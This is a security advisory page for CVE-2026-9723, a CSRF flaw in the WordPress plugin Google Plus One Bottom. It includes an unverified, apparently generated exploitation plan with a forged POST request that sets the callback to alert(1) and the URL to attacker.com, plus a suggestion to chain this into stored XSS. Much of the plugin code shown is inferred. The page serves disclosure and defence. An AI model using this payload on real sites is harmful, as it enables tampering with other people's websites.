CVE-2026-9723

Google Plus One Bottom <= 0.0.2 - Cross-Site Request Forgery to Plugin Settings Update via Settings Page

mediumCross-Site Request Forgery (CSRF)
4.3
CVSS Score
4.3
CVSS Score
medium
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The Google Plus One Bottom plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.0.2. This is due to missing or incorrect nonce validation on the googlePlusOneAdmin function. This makes it possible for unauthenticated attackers to modify the plugin's settings, including the plusone-lang, plusone-callback, and plusone-url options stored in the database via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=0.0.2
PublishedJune 1, 2026
Last updatedJune 2, 2026
Affected plugingoogle-plus-one-bottom
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-9723 ## 1. Vulnerability Summary The **Google Plus One Bottom** plugin (<= 0.0.2) for WordPress contains a Cross-Site Request Forgery (CSRF) vulnerability in its administrative settings processing logic. The function responsible for rendering and saving the se…

Show full research plan

Exploitation Research Plan: CVE-2026-9723

1. Vulnerability Summary

The Google Plus One Bottom plugin (<= 0.0.2) for WordPress contains a Cross-Site Request Forgery (CSRF) vulnerability in its administrative settings processing logic. The function responsible for rendering and saving the settings, googlePlusOneAdmin (inferred), fails to implement nonce validation (e.g., check_admin_referer()). This allows an attacker to trick a logged-in administrator into submitting a forged request that modifies critical plugin configurations, such as the language, callback functions, or target URLs for the Google Plus One button.

2. Attack Vector Analysis

  • Target Endpoint: /wp-admin/options-general.php?page=google-plus-one-bottom (inferred slug based on plugin name).
  • Vulnerable Action: POST request to the settings page when the submit (or similar) parameter is present.
  • Required Authentication: Administrator (victim must be logged in to execute the CSRF).
  • Payload Parameters (inferred from CVE description):
    • plusone-lang: The language code for the button.
    • plusone-callback: A JavaScript callback function name.
    • plusone-url: The URL the button targets.
  • Preconditions: The attacker must be able to trick the admin into clicking a link or visiting a page that triggers a cross-origin POST request to the WordPress site.

3. Code Flow (Inferred)

  1. Hook Registration: The plugin likely hooks into admin_menu to register a settings page.
    add_action('admin_menu', 'googlePlusOneMenu');
    function googlePlusOneMenu() {
        add_options_page('Google Plus One', 'Google +1', 'manage_options', 'google-plus-one-bottom', 'googlePlusOneAdmin');
    }
    
  2. Processing Function: The googlePlusOneAdmin function handles both displaying the form and saving data.
  3. Vulnerable Sink: Inside googlePlusOneAdmin, the code likely checks for POST data:
    function googlePlusOneAdmin() {
        if (isset($_POST['update_googlePlusOneSettings'])) { // Or similar submit check
            // VULNERABILITY: No check_admin_referer() call here
            update_option('plusone-lang', $_POST['plusone-lang']);
            update_option('plusone-callback', $_POST['plusone-callback']);
            update_option('plusone-url', $_POST['plusone-url']);
        }
        // ... renders the form ...
    }
    

4. Nonce Acquisition Strategy

According to the CVE description, the vulnerability exists because of missing or incorrect nonce validation.

  • If missing: No nonce is required. The exploit can proceed with a direct POST request.
  • If incorrect: The plugin might be using a generic nonce or failing to check the return value of wp_verify_nonce.

Since the primary flaw is the lack of protection, the exploitation strategy will assume no nonce is required.

5. Exploitation Strategy

The goal is to demonstrate that an unauthenticated attacker can change plugin settings via a forged request from an administrator.

  1. Identify Parameters: Access the settings page as an admin and inspect the form fields to confirm the exact name attributes for the inputs and the submit button.
  2. Craft Payload: Create a POST request that updates the options to malicious values (e.g., setting plusone-callback to an alert script or plusone-url to a malicious site).
  3. Execute Request: Use the http_request tool while authenticated as an administrator to simulate the CSRF.

Expected HTTP Request

POST /wp-admin/options-general.php?page=google-plus-one-bottom HTTP/1.1
Host: target.local
Content-Type: application/x-www-form-urlencoded
Cookie: [Admin Session Cookies]

plusone-lang=en-US&plusone-callback=alert(1)&plusone-url=https://attacker.com&update_googlePlusOneSettings=Save+Changes

6. Test Data Setup

  1. Install Plugin: Ensure google-plus-one-bottom version 0.0.2 is installed and active.
  2. Verify Default State:
    wp option get plusone-lang
    wp option get plusone-url
    
  3. Create Admin: Ensure a standard administrator user exists for the simulation.

7. Expected Results

  • The server should return a 200 OK or 302 Found (redirect).
  • The database options plusone-lang, plusone-callback, and plusone-url should reflect the values sent in the POST request.
  • No "Are you sure you want to do this?" (WordPress's default CSRF failure message) should appear.

8. Verification Steps

After the http_request is sent, verify the change via WP-CLI:

# Check if the settings were updated
wp option get plusone-lang
wp option get plusone-callback
wp option get plusone-url

If the values match en-US, alert(1), and https://attacker.com respectively, the CSRF is confirmed.

9. Alternative Approaches

  • Settings Page Discovery: If the slug google-plus-one-bottom is incorrect, use wp post list --post_type=page is not relevant; instead, use grep -r "add_options_page" wp-content/plugins/google-plus-one-bottom/ to find the correct slug and callback function.
  • XSS Chain: If plusone-callback or plusone-url are rendered on the frontend without escaping, use the CSRF to inject a script tag, upgrading the CSRF to a Stored XSS attack.
  • Submit Variable: If update_googlePlusOneSettings is not the correct name for the submit button, use browser_eval to find the submit button name:
    browser_eval("document.querySelector('input[type=submit]').name")

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.